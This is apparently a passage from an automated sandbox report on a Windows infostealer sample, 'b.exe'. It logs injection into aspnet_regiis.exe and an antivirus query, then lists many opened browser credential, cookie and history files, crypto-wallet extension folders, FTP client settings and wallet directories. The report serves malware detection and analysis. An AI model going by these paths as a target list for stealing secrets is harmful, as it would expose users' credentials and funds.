            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2499000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2441000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2484000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2487000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2498000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2499000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2641008Jump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDE17D8 cpuid 0_2_6CDE17D8
            Source: C:\Users\user\Desktop\b.exeQueries volume information: C:\Users\user\Desktop\b.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDE1253 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CDE1253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: aspnet_regiis.exe, 00000002.00000003.1876677261.0000000002935000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7728, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
